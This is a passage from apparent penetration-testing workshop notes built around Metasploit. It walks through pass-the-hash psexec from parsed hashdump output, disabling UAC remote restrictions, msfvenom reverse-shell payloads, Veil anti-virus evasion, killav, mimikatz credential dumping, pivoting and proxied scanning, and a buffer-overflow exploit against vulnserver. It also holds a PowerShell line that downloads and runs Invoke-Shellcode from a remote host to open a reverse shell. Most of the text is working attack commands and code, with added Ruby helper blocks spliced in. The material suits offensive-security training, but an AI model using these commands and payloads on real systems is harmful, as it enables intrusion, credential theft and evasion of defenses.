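  Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  Workshop:1001:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
  svc_backup:1002:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
  [*] this line is status chatter, not a hash
DUMP

# user:rid:lm:nt::: with 32 hex digits per hash
HASH_RE = /\A(?<user>[^:]+):(?<rid>\d+):(?<lm>\h{32}):(?<nt>\h{32}):::\z/

# Array of {user:, rid:, lm:, nt:} for every well-formed line; others are skipped.
def parse_hashdump(text)
  text.each_line.map do |line|
    m = HASH_RE.match(line.strip)
    m && { user: m[:user], rid: m[:rid].to_i, lm: m[:lm].downcase, nt: m[:nt].downcase }
  end.compact
end

# Empty NT hash: the account has no password, so it is usually disabled.
def empty_password?(entry)
  entry[:nt] == EMPTY_NT
end

# A real LM hash means LM storage was not disabled on this host; LM is
# case-insensitive and split into two 7-byte halves, so it cracks offline fast.
def lm_stored?(entry)
  entry[:lm] != EMPTY_LM
end

# SMBPass takes LM:NT, exactly as hashdump prints it.
def smbpass_for(entry)
  "#{entry[:lm]}:#{entry[:nt]}"
end

# Accounts worth a pass-the-hash attempt: skip empty passwords and Guest (RID 501).
def candidates(text)
  parse_hashdump(text).reject { |e| empty_password?(e) || e[:rid] == 501 }
end

# msfconsole lines for exploit/windows/smb/psexec against rhost with this entry.
def psexec_commands(entry, rhost, lhost, lport)
  [
    'use exploit/windows/smb/psexec',
    "set SMBUser #{entry[:user]}",
    "set SMBPass #{smbpass_for(entry)}",
    "set RHOST #{rhost}",
    'set PAYLOAD windows/meterpreter/reverse_tcp',
    "set LHOST #{lhost}",
    "set LPORT #{lport}",
    'exploit'
  ]
end

if __FILE__ == $PROGRAM_NAME
  candidates(SAMPLE_HASHDUMP).each do |e|
    note = lm_stored?(e) ? '   # LM hash stored: crack it offline too' : ''
    puts "# #{e[:user]} (RID #{e[:rid]})#{note}"
    puts psexec_commands(e, '192.168.153.163', '192.168.153.164', 5678)
    puts
  end
end
```

Paste the printed block into msfconsole, or feed it in as a resource file with `-r`, which is exactly what Chapter 4 below does by hand.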
  1063.  
  1064. #####################
  1065. # Fix broken PSExec #
  1066. #####################
  1067. - We use the execute command below to get an interactive cmd.exe on the victim, so we can add a registry value.
  1068.  
  1069. meterpreter > execute -c -H -f cmd -a "/k" -i
  1070. reg /?
  1071.  
  1072.  
  1073. - Add a registry value on the victim. LocalAccountTokenFilterPolicy=1 turns off UAC remote restrictions, so a local account in the Administrators group (such as Workshop) gets a full, unfiltered admin token over SMB and psexec works. Without it only the built-in Administrator account (RID 500) can psexec in, which is why the module fails against Win7 with the Workshop account.
  1074.  
  1075. C:\Windows\system32> reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system  /v LocalAccountTokenFilterPolicy  /t REG_DWORD  /d  1
  1076.  
  1077.  
  1078.  
  1079. ###########################################
  1080. # Chapter 3: Custom Meterpreter Scripting #
  1081. ###########################################
  1082.  
  1083.  
  1084. - In this lab we will be looking at how you can use some custom Meterpreter scripts to do more than what Metasploit can offer. This will also show you the flexibility of the Meterpreter scripts.
  1087.  
  1088. - We're going to start off with a simple Hello World script first.  
  1089.  
  1090.    
  1091. echo 'print_status("Hello World")' > /home/strategicsec/toolz/metasploit/scripts/meterpreter/helloworld.rb
  1092.  
  1093.  
  1094. - This next portion is up to you, exploit your test box and end up with a Meterpreter shell.
  1095.  
  1096. - Lets test out our helloworld.rb Meterpreter script.
  1097.  
  1098.  
  1099. meterpreter> run helloworld
  1100.  
  1101.  
  1102. - So far so good, now we can build on this base.  Lets add a couple more API calls to the script.
  1103.  
  1104. - Open /home/strategicsec/toolz/metasploit/scripts/meterpreter/helloworld.rb in your favorite editor and add the following lines:
  1107. vi /home/strategicsec/toolz/metasploit/scripts/meterpreter/helloworld.rb
  1108.  
  1109.  
  1110. print_error("this is an error!")
  1111. print_line("this is a line")
  1112.  
  1113. - Now run the script:
  1114.  
  1115. meterpreter> run helloworld
  1116.  
  1117.  
  1118. - Now that we have the basics down, we're going to do something a little more exciting.  
  1119. - The architecture to follow when creating these scripts goes as follows:
  1120.  
  1121. def getinfo(session)
  1122.         begin
  1123.             <stuff goes here>
  1124.         rescue ::Exception => e
  1125.             <stuff goes here>
  1126.         end
  1127. end
  1128.  
  1129.  
  1130. - Copy and paste the following code into our helloworld.rb script:
  1131.  
  1132. def getinfo(session)
  1133.     begin
  1134.        sysnfo = session.sys.config.sysinfo
  1135.        runpriv = session.sys.config.getuid
  1136.        print_status("Getting system information ...")
  1137.        print_status("The target machine OS is #{sysnfo['OS']}")
  1138.        print_status("The computer name is #{sysnfo['Computer']} ")
  1139.        print_status("Script running as #{runpriv}")
  1140.     rescue ::Exception => e
  1141.       print_error("The following error was encountered #{e}")
  1142.    end
  1143. end
  1144.  
  1145. getinfo(client)
  1146.  
  1147.  
  1148.  
  1149. - Now run the script:
  1150.  
  1151. meterpreter> run helloworld
  1152.  
  1153.  
  1154. - We can expand it by adding actual system commands to the script, lets look at how we can do this.
  1155.  
  1156.  
  1157. def list_exec(session,cmdlst)
  1158.     print_status("Running Command List ...")
  1159.     r=''
  1160.     session.response_timeout=120
  1161.     cmdlst.each do |cmd|
  1162.        begin
  1163.           print_status "running command #{cmd}"
  1164.           r = session.sys.process.execute("cmd.exe /c #{cmd}", nil, {'Hidden' => true, 'Channelized' => true})
  1165.           while(d = r.channel.read)
  1166.  
  1167.              print_status("#{d}")
  1168.           end
  1169.           r.channel.close
  1170.           r.close
  1171.        rescue ::Exception => e
  1172.           print_error("Error Running Command #{cmd}: #{e.class} #{e}")
  1173.        end
  1174.     end
  1175. end
  1176.  
  1177. commands = [ "set",
  1178.     "ipconfig  /all",
  1179.     "arp -a"]
  1180.  
  1181. list_exec(client,commands)
  1182.  
  1183.  
  1184.  
  1185. - Run the script:
  1186.  
  1187. meterpreter> run helloworld
  1188.  
  1189.  
  1190.  
  1191.  
  1192.  
  1193.  
  1194. ################################################
  1195. # Chapter 4: Writing Meterpreter Resource Files #
  1196. ################################################
  1197.  
  1198.  
  1199. - In this lab we are going to create a binary payload with msfvenom, then craft a .rc file that automates the
  1200. process of setting up the multi/handler listener.
  1201.  
  1202. - We will start off by creating the payload with msfvenom. First flush the firewall rules so the connection back can reach the handler:
  1203.  
  1204. sudo /sbin/iptables -F
  1205.     strategicsec                    (sudo password)
  1206.  
  1207. cd ~/toolz/metasploit
  1208.  
  1209. ./msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows LHOST=192.168.153.164 -f exe > /home/strategicsec/Desktop/meterpreter.exe
  1210.  
  1211. sudo chmod 777 /home/strategicsec/Desktop/meterpreter.exe
  1212.  
  1213. - In the syntax above, we set the payload, set the local host address to connect back to, then redirected the
  1214. malicious payload to our desktop by issuing the correct path. We also change the permissions on it to 777 just
  1215. to make it easy for us to use WinSCP to copy it over to our Win7 machine. LPORT was left at its default, 4444, so the handler below must use the same port.
  1216.  
  1217. - Next we are going to create a .rc (resource file) file that will automate the process for setting up a listener.
  1218.  
  1219. - Navigate to the /home/strategicsec/toolz/metasploit/ so that when you create the .rc file you can save it in the
  1220. working directory.
  1221.  
  1222.  
  1223. - Type 'touch meterpreter.rc' to create the file.
  1224. touch meterpreter.rc
  1225.  
  1226. - Type 'echo use exploit/multi/handler  >> meterpreter.rc' to be appended to the .rc file.
  1227. echo use exploit/multi/handler  >> meterpreter.rc
  1228.  
  1229. - Type 'echo set PAYLOAD windows/meterpreter/reverse_tcp  >> meterpreter.rc' to be appended to the .rc file.
  1230. echo set PAYLOAD windows/meterpreter/reverse_tcp  >> meterpreter.rc
  1231.  
  1232. - Type 'echo set LHOST 192.168.153.164>> meterpreter.rc' to be appended to the .rc file.
  1233. echo set LHOST 192.168.153.164>> meterpreter.rc
  1234.  
  1235. - Type 'echo exploit -j -z >> meterpreter.rc' to be appended to the .rc file.
  1236. echo exploit -j -z >> meterpreter.rc
  1237.  
  1238. - Then cat the meterpreter.rc out to verify that everything in the file looks ok.
  1239. cat meterpreter.rc
  1240.  
  1241. Now at the command prompt, type './msfconsole -r meterpreter.rc' to start msfconsole and run the 'meterpreter.rc' file
  1242. (no sudo is needed: the handler listens on 4444, which is above the privileged port range).
  1243.  
  1244. ./msfconsole -r meterpreter.rc
  1245.  
  1246. - Once the msfconsole starts, the meterpreter resource file is executed and the listener is automatically setup.  It is now listening for a connection!
  1247.  
  1248. - Now you must transfer the malicious meterpreter payload to the victim machine (you may do so by any means necessary; we have physical access, so we transferred it via USB).
  1249.  
  1250. - Double-click meterpreter.exe on the victim to create the meterpreter session.
  1251.  
  1252. - Type 'sessions -l' to list your open sessions, and 'sessions -i 1' to indicate that you want to interact with the meterpreter session under id 1.
  1255.  
  1256. exit -y
  1257.        
  1258.  
  1259.  
  1260.  
  1261. ***********************************
  1262. * Getting Serious About .rc files *
  1263. ***********************************
  1264.  
  1265.  
  1266. touch /home/strategicsec/toolz/metasploit/autorun-walk-through.rc
  1267.  
  1268. echo run getcountermeasure >> /home/strategicsec/toolz/metasploit/autorun-walk-through.rc
  1269.  
  1270. echo run winenum >> /home/strategicsec/toolz/metasploit/autorun-walk-through.rc
  1271.  
  1272. echo run post/windows/gather/enum_applications >> /home/strategicsec/toolz/metasploit/autorun-walk-through.rc
  1273.  
  1274. echo run post/windows/gather/enum_logged_on_users >> /home/strategicsec/toolz/metasploit/autorun-walk-through.rc
  1275.  
  1276. echo run post/windows/gather/checkvm >> /home/strategicsec/toolz/metasploit/autorun-walk-through.rc
  1277.  
  1278.  
  1279.  
  1280. - Ok, that was fun. Now let's take a quick look at the .rc file we just created.
  1281. cat /home/strategicsec/toolz/metasploit/autorun-walk-through.rc
  1282.  
  1283.  
  1284.  
  1285.  
  1286. touch /home/strategicsec/toolz/metasploit/old-faithful-ie8.rc
  1287.  
  1288.  
  1289. echo use exploit/windows/browser/ie_cgenericelement_uaf >> /home/strategicsec/toolz/metasploit/old-faithful-ie8.rc
  1290.  
  1291. echo set ExitOnSession true >> /home/strategicsec/toolz/metasploit/old-faithful-ie8.rc
  1292.  
  1293. echo set URIPATH /ie8 >> /home/strategicsec/toolz/metasploit/old-faithful-ie8.rc
  1294.  
  1295. echo set PAYLOAD windows/meterpreter/reverse_tcp >> /home/strategicsec/toolz/metasploit/old-faithful-ie8.rc
  1296.  
  1297. echo set LHOST 192.168.153.164 >> /home/strategicsec/toolz/metasploit/old-faithful-ie8.rc                            
  1298.  
  1299.            
  1300.  
  1301. echo set AutoRunScript multi_console_command -rc /home/strategicsec/toolz/metasploit/autorun-walk-through.rc >> /home/strategicsec/toolz/metasploit/old-faithful-ie8.rc
  1302.  
  1303. echo exploit -j -z >> /home/strategicsec/toolz/metasploit/old-faithful-ie8.rc
  1304.  
  1305.  
  1306.  
  1307. - Ok, that was more fun than the previous one. Now let's take a quick look at the .rc file we just created.
  1308. cat /home/strategicsec/toolz/metasploit/autorun-walk-through.rc
  1309.  
  1310. cat /home/strategicsec/toolz/metasploit/old-faithful-ie8.rc
  1311.  
  1312. - Alright, enough already. Let's run this thing.
  1313. ./msfconsole -r old-faithful-ie8.rc
  1314.  
  1315.  
  1316.  
  1317.  
  1318.  
  1319. #################################
  1320. # Chapter 5: Anti-Virus Evasion #
  1321. #################################
  1322. ------------------------------------------------------------
  1323. - Now it is time to work on some anti-virus evasion. Veil is the new tool on the scene for AV evasion.
  1324. sudo pip install PyInstaller
  1325.         strategicsec
  1326.  
  1327. cd /home/strategicsec/toolz/Veil-Evasion/setup
  1328.  
  1329. sudo ./setup.sh
  1330.         /home/strategicsec/toolz/metasploit/            (when it asks for the path to Metasploit)
  1331.  
  1332. cd /home/strategicsec/toolz/Veil-Evasion/
  1333.  
  1334. sudo python Veil-Evasion.py
  1335.  
  1336. update
  1337.  
  1338. clean
  1339.  
  1340. y
  1341.  
  1342. list
  1343.  
  1344. info 5
  1345.  
  1346. use 5
  1347.  
  1348. set LHOST 192.168.230.128
  1349.  
  1350. info
  1351.  
  1352. generate
  1353.  
  1354.         payload         (when it asks for a base name)
  1355.  
  1356. exit
  1357.  
  1358. sudo mv /usr/share/veil-output/compiled/payload.exe /home/strategicsec/            (the output path for payload.exe may differ on your system)
  1359.  
  1360. sudo chmod 777 /home/strategicsec/payload.exe
  1361.  
  1362. cd ~/toolz/metasploit
  1363.  
  1364. ./msfconsole  -r /usr/share/veil-output/handlers/payload_handler.rc
  1365.  
  1366.  
  1367. - From your Win7 host use WinSCP to copy payload.exe from the Ubuntu host to your Win7 desktop.
  1368. - double click payload.exe and see if you get a Meterpreter session
  1369.  
  1370.  
  1371.  
  1372. use exploit/windows/local/ask
  1373. set SESSION 1
  1374. set PAYLOAD windows/meterpreter/reverse_tcp
  1375. set LHOST 192.168.230.128                                            (Make sure you change this to your ubuntu ip address)
  1376. set LPORT 7799
  1377. exploit
  1378.  
  1379.  
  1380. meterpreter > getuid
  1381. Server username: win7-64-victim\Workshop
  1382. meterpreter > getsystem
  1383. ...got system (via technique 1).
  1384. meterpreter > getuid
  1385. Server username: NT AUTHORITY\SYSTEM
  1386.  
  1387. meterpreter> ps
  1388.  
  1389. meterpreter> migrate 2110                                       (Make sure this process is running as NT AUTHORITY\SYSTEM; your PID will differ)
  1390.  
  1391. meterpreter> run killav
  1392.  
  1393. meterpreter> run post/windows/gather/hashdump
  1394.  
  1395. meterpreter> run post/windows/gather/credentials/credential_collector
  1396.  
  1397. meterpreter > load mimikatz
  1398.  
  1399. meterpreter > kerberos
  1400.  
  1401. meterpreter > background
  1402.  
  1403. exit -y
  1404.  
  1405.  
  1406.  
  1407.  
  1408.  
  1409.  
  1410. ###########################################
  1411. # Section 3: Tunneling For Fun and Profit #
  1412. ###########################################
  1413.  
  1414. *****************************Enumerate the network you are on ***************************
  1415.  
  1416. meterpreter > run netenum
  1417.  
  1418. meterpreter > run netenum -ps -r 192.168.153.0/24
  1419.  
  1420. meterpreter > run post/windows/gather/arp_scanner RHOSTS=192.168.153.0/24
  1421.  
  1422.  
  1423.  
  1424. ********************************** Set up your Pivot **********************************
  1425.  
  1426. meterpreter > background                                <-- background the session; you land at the msf exploit(handler) > prompt
  1427.  
  1428.         msf exploit(handler) > back                     <--- you need to get to the main msf > prompt
  1429.  
  1430.  
  1431.  
  1432.  
  1433.         sessions -l                                     <--find a session you want to pivot through (note the IP and session number)
  1434.        
  1435.         Now set up Pivot with a route add
  1436.         ---------------------------------
  1437.  
  1438. route print
  1439.  
  1440. route add 192.168.153.0 255.255.255.0 1                         <-- subnet, netmask, session id. Use the session id you noted above (it may be 2, 3, or 4), and make sure you are at the msf> prompt, not meterpreter
  1441.  
  1442.  
  1443. route print                                             <----- verify new route
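The route names a subnet and its mask, not a single host. As an added example that is not part of the original notes, the Ruby below computes the network address from any host on the subnet (so 192.168.153.163 with a /24 mask becomes 192.168.153.0) and turns the "Local subnet:" lines that run get_local_subnets prints into route add commands for the session you are pivoting through. The sample output lines are constructed, the exact wording of that script's output is assumed, and dropping the attacker's own subnet is this example's choice: in this lab the Ubuntu host and the victim share the one /24, so pass nil as attacker_ip to keep that route.

```ruby
require 'ipaddr'

# Added example, not from the original notes. Constructed sample of what
# `run get_local_subnets` prints for a session (exact wording assumed).
SAMPLE_SUBNETS = <<~OUT
  [*] Local subnet: 192.168.153.0/255.255.255.0
  [*] Local subnet: 10.10.20.0/255.255.255.0
  [*] Local subnet: 169.254.0.0/255.255.0.0
OUT

SUBNET_RE = %r{Local subnet: (\d{1,3}(?:\.\d{1,3}){3})/(\d{1,3}(?:\.\d{1,3}){3})}

# Network address for any host on the subnet:
# network_of("192.168.153.163", "255.255.255.0") -> "192.168.153.0"
def network_of(ip, mask)
  IPAddr.new(ip).mask(mask).to_s
end

# [[net, mask], ...] from the get_local_subnets output
def parse_local_subnets(text)
  text.scan(SUBNET_RE)
end

# Is ip inside net/mask?
def in_subnet?(ip, net, mask)
  IPAddr.new("#{net}/#{mask}").include?(IPAddr.new(ip))
end

LINK_LOCAL = IPAddr.new('169.254.0.0/16')

# `route add` lines for msfconsole through session_id. Link-local subnets are
# dropped, and so is the subnet the attacker already sits on when attacker_ip
# is given (traffic there does not need the pivot).
def pivot_routes(text, session_id, attacker_ip = nil)
  parse_local_subnets(text).reject do |net, mask|
    LINK_LOCAL.include?(IPAddr.new(net)) ||
      (attacker_ip && in_subnet?(attacker_ip, net, mask))
  end.map do |net, mask|
    "route add #{network_of(net, mask)} #{mask} #{session_id}"
  end
end

if __FILE__ == $PROGRAM_NAME
  puts network_of('192.168.153.163', '255.255.255.0')
  puts pivot_routes(SAMPLE_SUBNETS, 1, '192.168.153.164')
end
```

Run route print afterwards, as above, to confirm that the subnet (not a host) is listed with the session id you meant.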
  1444.  
  1445. ******************************Scan through your Pivot ******************************
  1446.  
  1447. use auxiliary/scanner/portscan/tcp                      <-- Run aux modules through your pivot
  1448.  
  1449. set THREADS 10
  1450.  
  1451. set RHOSTS 192.168.153.0/24             <-- Keep changing this IP and re-running the scan until you find something you want to attack
  1452.  
  1453. set PORTS 445
  1454.  
  1455. run
  1456.  
  1457.  
  1458. ************************* Lateral movement through your Pivot *************************
  1459.  
  1460. -- Option 1:
  1461. use exploit/windows/smb/psexec
  1462.  
  1463. set RHOST 192.168.153.163
  1464.  
  1465. set LPORT 2345
  1466.  
  1467. set SMBUser Workshop
  1468.  
  1469. set SMBPass password
  1470.  
  1471. exploit
  1472.  
  1473.  
  1474.  
  1475.  
  1476. -- Option 2:
  1477. use exploit/windows/smb/psexec
  1478.  
  1479. set SMBUser Workshop
  1480.  
  1481. set SMBPass aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c                  <-- LM:NT hash of "password" as printed by hashdump (same as Option 2 under Lateral Movement); 31d6cfe0d16ae931b73c59d7e0c089c0 would be the NT hash of an empty password
  1482.  
  1483. set payload windows/meterpreter/reverse_tcp
  1484.  
  1485. set RHOST 192.168.153.163                      
  1486.  
  1487. set LHOST 192.168.153.164
  1488.  
  1489. set LPORT 5678
  1490.  
  1491. exploit
  1492.  
  1493.  
  1494.  
  1495. -- Option 3:
  1496. background
  1497. use auxiliary/admin/smb/upload_file
  1498.  
  1499. set SMBUser Workshop
  1500.  
  1501. set SMBPass aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c                  <-- LM:NT hash of "password", as in Option 2
  1502.  
  1503. set LPATH /home/strategicsec/binaries/wce.exe
  1504.  
  1505. set RPATH "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\wce.exe"
  1506.  
  1507. set RHOST 192.168.153.163                      
  1508.  
  1509. run
  1510.  
  1511.  
  1512.  
  1513. -- Option 4:
  1514. use auxiliary/admin/smb/upload_file
  1515.  
  1516. set SMBUser Workshop
  1517.  
  1518. set SMBPass password
  1519.  
  1520. set LPATH /home/strategicsec/binaries/wce.exe
  1521.  
  1522. set RPATH "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\wce.exe"
  1523.  
  1524. set RHOST 192.168.153.163                      
  1525.  
  1526. run
  1527.  
  1528.  
  1529. -- Option 5:
  1530. use exploit/multi/handler
  1531. set ExitOnSession false
  1532. set payload windows/meterpreter/reverse_https
  1533. set LHOST 192.168.153.164
  1534. set LPORT 4443
  1535. set EXITFUNC thread
  1536. exploit -j
  1537.  
  1538.  
  1539.  
  1540. sessions -i 1
  1541. shell
  1542. powershell -command "IEX (New-Object Net.WebClient).DownloadString('https://s3.amazonaws.com/StrategicSec-Files/Powersploit/Invoke-Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.153.164 -Lport 4443 -Force"
  1543.  
  1544.  
  1545. ####################################
  1546. # Socks Tunneling with Proxychains #
  1547. ####################################
  1548. --- Open a duplicate putty session to your Ubuntu host
  1549.  
  1550. sudo apt-get install -y proxychains
  1551.     strategicsec
  1552.  
  1553. sudo vi /etc/proxychains.conf                           <--- Make sure that last line of the file is: socks4  127.0.0.1 1080
  1554.  
  1555.         Comment out the proxy_dns, change the 9050 (tor port) to the metasploit socks proxy port (1080) and save it.
  1556.         socks4  127.0.0.1 1080
  1557.  
  1558. ***************************Set up a Socks Proxy through your Pivot *************************
  1559.  
  1560.  
  1561. use auxiliary/server/socks4a
  1562.  
  1563. set SRVHOST 127.0.0.1
  1564.  
  1565. set SRVPORT 1080
  1566.  
  1567. run
  1568.  
  1569.         --- Go back to your other putty session with the meterpreter shell
  1570. cd ~
  1571.  
  1572. proxychains nmap -sT -Pn -n -vv -sV --script=smb-os-discovery.nse -p 445 192.168.153.0/24          <--- This is going to be really slow
  1573.  
  1574. proxychains nmap -sT -Pn -n -sV -p 21,22,23,25,80,110,139,443,1433,1521,3306,3389,8080,10000 192.168.153.0/24           <--- This is going to be really slow
  1575. - Only full TCP connects (-sT) go through the SOCKS proxy; SYN scans and ICMP ping probes bypass it, hence -sT and -Pn. -n stops nmap from trying DNS lookups, which proxychains would not carry anyway with proxy_dns commented out.
  1575.  
  1576.  
  1577.         ---close the duplicate putty session to your Ubuntu host
  1578.  
  1579.  
  1580.  
  1581.  
  1582. ##################
  1583. # Day 2 Homework #
  1584. ##################
  1585. Please take screenshots of yourself working through videos 11-20 in this playlist:
  1586. https://www.youtube.com/playlist?list=PL1512BD72E7C9FFCA
  1587.  
  1588. Please take screenshots of yourself doing all of the steps in section 3 of this pastebin.
  1589.  
  1590. ##################################
  1591. # Section 4: Exploit Development #
  1592. ##################################
  1593.  
  1594. ###############################################
  1595. # Chapter 9: Porting an exploit to Metasploit #
  1596. ###############################################
  1597.  
  1598. ***********************************************
  1599. * Vulnerable Server Versus Fuzzer and Company *
  1600. ***********************************************
  1601.  
  1602.  
  1603. - Inside of your Windows7 VM - download the following file to the Desktop:
  1604. https://s3.amazonaws.com/StrategicSec-Files/SimpleExploitLab.zip
  1605.  
  1606. - Extract this zip file to your Desktop
  1607.  
  1608. - Go to folder C:\Users\Workshop\Desktop\ExploitLab\2-VulnServer, and run vulnserv.exe
  1609.  
  1610. - Open a new command prompt and type:
  1611. nc localhost 9999
  1612.  
  1613. - In the new command prompt window where you ran nc type:
  1614. HELP
  1615.  
  1616. - Go to folder C:\Users\Workshop\Desktop\ExploitLab\4-AttackScripts
  1617. - Right-click on 1-simplefuzzer.py and choose the option edit with notepad++
  1618.  
  1619. - Now double-click on 1-simplefuzzer.py
  1620. - You'll notice that vulnserv.exe crashes. Be sure to note what command and the number of As it crashed on.
  1621.  
  1622.  
  1623. - Restart vulnserv, and run 1-simplefuzzer.py again. Be sure to note what command and the number of As it crashed on.
  1626.  
  1627. - Now go to folder C:\Users\Workshop\Desktop\ExploitLab\3-OllyDBG and start OllyDBG. Choose 'File' -> 'Attach' and attach to process vulnserv.exe
  1630.  
  1631. - Go back to folder C:\Users\Workshop\Desktop\ExploitLab\4-AttackScripts and double-click on 1-simplefuzzer.py.
  1632.  
  1633. - Take note of the registers (EAX, ESP, EBP, EIP) that have been overwritten with As (41s).
  1634.  
  1635. - Now isolate the crash by restarting your debugger and running script 2-3000chars.py
  1636.  
  1637. - Calculate the distance to EIP by running script 3-3000chars.py
  1638. - This script sends 3000 nonrepeating chars to vulnserv.exe and populates EIP with the value: 396F4338
  1639.  
  1640. 4-count-chars-to-EIP.py
  1641. - In the previous script we saw EIP overwritten with 396F4338. x86 is little-endian, so the bytes that landed on the stack, in order, were 38 43 6F 39, which is the ASCII string 8Co9 (8 = 38, C = 43, o = 6F, 9 = 39)
  1642. - so we search for 8Co9 in the string of nonrepeating chars and count the distance to it; that index is the distance to EIP
  1643.  
  1644. 5-2006char-eip-check.py
  1645. - In this script we check to see if our math is correct in our calculation of the distance to EIP by overwriting EIP with 42424242 (four Bs)
  1648.  
  1649. 6-jmp-esp.py
  1650. - In this script we overwrite EIP with a JMP ESP (6250AF11) inside of essfunc.dll
  1651.  
  1652. 7-first-exploit
  1653. - In this script we actually do the stack overflow and launch a bind shell on port 4444
  1654.  
  1655. 8 - Take a look at the file vulnserv.rb and place it in your Ubuntu host via SCP, or copy it and paste the code into the host.
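Scripts 3 to 6 boil down to three pieces of arithmetic: build a cyclic pattern, map the EIP value back to the bytes that sat on the stack, and find those bytes in the pattern. As an added example (not one of the lab's scripts), the Ruby below re-implements the logic of Metasploit's pattern_create.rb and pattern_offset.rb for the default character sets, confirms that 396F4338 sits at offset 2006 (which is why the next script is named 5-2006char-eip-check.py), and then lays out the EIP check buffer and the final JMP ESP buffer the way scripts 5 and 6 do. The "TRUN /.:/" prefix, the 16-byte NOP sled and the placeholder shellcode are assumptions for this example; the JMP ESP address 6250AF11 is the one quoted in the lab.

```ruby
# Added example, not from the original lab scripts: the arithmetic behind
# 3-3000chars.py and 4-count-chars-to-EIP.py, then the buffer layout of
# 5-2006char-eip-check.py and 6-jmp-esp.py. Offsets are counted from the
# start of the pattern, which the scripts send after the command prefix
# (prefix assumed to be "TRUN /.:/").

UPPER  = ('A'..'Z').to_a
LOWER  = ('a'..'z').to_a
DIGITS = ('0'..'9').to_a

# "Aa0Aa1Aa2...": every 3-byte group is unique for 26*26*10*3 = 20280 bytes,
# the same sequence Metasploit's pattern_create produces by default.
def pattern_create(length)
  buf = String.new
  UPPER.each do |u|
    LOWER.each do |l|
      DIGITS.each do |d|
        buf << u << l << d
        return buf[0, length] if buf.length >= length
      end
    end
  end
  buf[0, length]
end

# The debugger shows EIP as a big-endian number, but the bytes were stored
# little-endian, so 0x396F4338 is "8Co9" in memory.
def eip_to_bytes(hex)
  [hex.to_i(16)].pack('V')
end

# Offset of those 4 bytes in the pattern, or nil if EIP did not come from it.
def pattern_offset(eip_hex, length = 3000)
  pattern_create(length).index(eip_to_bytes(eip_hex))
end

# Script 5: junk up to EIP, then "BBBB" so EIP should read 42424242.
def eip_check_buffer(offset, prefix: 'TRUN /.:/')
  prefix + 'A' * offset + 'BBBB'
end

# Script 6/7: junk up to EIP, the JMP ESP address little-endian (so the
# return lands in essfunc.dll), a NOP sled, then the shellcode.
def build_exploit(offset:, jmp_esp:, shellcode:, prefix: 'TRUN /.:/', nops: 16)
  buf = prefix.b
  buf << 'A' * offset
  buf << [jmp_esp].pack('V')
  buf << "\x90".b * nops
  buf << shellcode.b
  buf
end

if __FILE__ == $PROGRAM_NAME
  off = pattern_offset('396F4338')
  puts "EIP bytes #{eip_to_bytes('396F4338').inspect} found at offset #{off}"
  buf = build_exploit(offset: off, jmp_esp: 0x6250AF11, shellcode: "\xCC".b * 4)
  ret = [0x6250AF11].pack('V')
  puts "JMP ESP bytes #{ret.inspect} at offset #{buf.index(ret)} of the final buffer"
end
```

Note that the offset is relative to the pattern, not to the whole TCP payload: if your script sends the command prefix and the pattern in one string, subtract the prefix length before comparing with the 2006 in the script names.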
  1658.  
  1659.  
  1660. ------------------------------
  1661.  
  1662. cd /home/strategicsec/toolz/metasploit/modules/exploits/windows/misc
  1663.  
  1664. vi vulnserv.rb
  1665.  
  1666.  
  1667.  
  1668. cd ~/toolz/metasploit
  1669.  
  1670. ./msfconsole
  1671.  
  1672.  
  1673.  
  1674. use exploit/windows/misc/vulnserv
  1675. set PAYLOAD windows/meterpreter/bind_tcp
  1676. set RHOST 192.168.153.163
  1677. set RPORT 9999
  1678. exploit
  1679.  
  1680.  
  1681.  
  1682.  
  1683.  
  1684.  
  1685.  
  1686. #########################################
  1687. # Chapter 12: Shellcoding with MSFVenom #
  1688. #########################################
  1689.  
  1690.  
  1691. -No shellcoding walk-through can be considered complete without covering Metasploit’s MSFPayload replacement
  1692. msfvenom.
  1693.  
  1694. -If you have never used msfvenom, the first thing you should do is read the help menu (./msfvenom -h) and get
  1695. familiar with its flags.
  1696.  
  1697. -Example 1: If you wish to list all the payloads available, you can do the following (also the same for listing
  1698. encoders, nops, or all):
  1699.  
  1700. ./msfvenom -l payloads  
  1701.  
  1702.  
  1703. - Example 2: Generating a windows/meterpreter/reverse_tcp:
  1704. ./msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP -f exe
  1705.  
  1706.  
  1707. - Example 3: To generate a payload that avoids certain bad characters:
  1708. ./msfvenom -p windows/meterpreter/bind_tcp -b '\x00'
  1709.  
  1710.  
  1711. - Example 4: To generate a payload with a specific encoder, and then encode 3 times:
  1712. ./msfvenom -p windows/meterpreter/bind_tcp -e x86/shikata_ga_nai -i 3  
  1713.  
  1714. -Example 5: Inject a payload to calc.exe, and save it as new.exe
  1715.  
  1716. ./msfvenom -p windows/meterpreter/bind_tcp -x calc.exe -k -f exe > new.exe  
  1717.  
  1718.  
  1719.  
  1720. - msfvenom is a combination of Msfpayload and Msfencode, putting both of these tools into a single Framework instance.
  1721.  
  1722. -Note: msfvenom has replaced both msfpayload and msfencode as of June 8th, 2015.
  1723.  
  1724. -The advantages of msfvenom are:
  1725. One single tool
  1726. Standardized command line options
  1727. Increased speed
  1728.  
  1729. -Msfvenom has a wide range of options available.
  1730.  
  1731. -MSFvenom command line usage
  1732. -The original notes showed a screenshot of an msfvenom command line and its output here: a Windows bind shell run through three
  1733. iterations of the shikata_ga_nai encoder, with null bytes excluded, emitted in the python format (that is, Example 4 above
  1734. with -b '\x00' and -f python added). The screenshot is not reproduced in this text.
  1735.  
  1736. -Run ./msfvenom --help-formats to print the list of available output formats.
  1737.  
  1738. -MSFvenom options and uses
  1739.  
  1740. msfvenom -v or --var-name
  1741.  
  1742. -Usage: -v, --var-name <name>
  1743. -Specify a custom variable name to use for certain output formats (python, c, ruby and the like). Assigning a name changes
  1744. the output's variable from the default "buf" to whatever word you supplied. (The original notes showed a screenshot of the
  1745. default output here.)
  1746.  
  1750.  
  1751.  
  1752. msfvenom -n, --nopsled
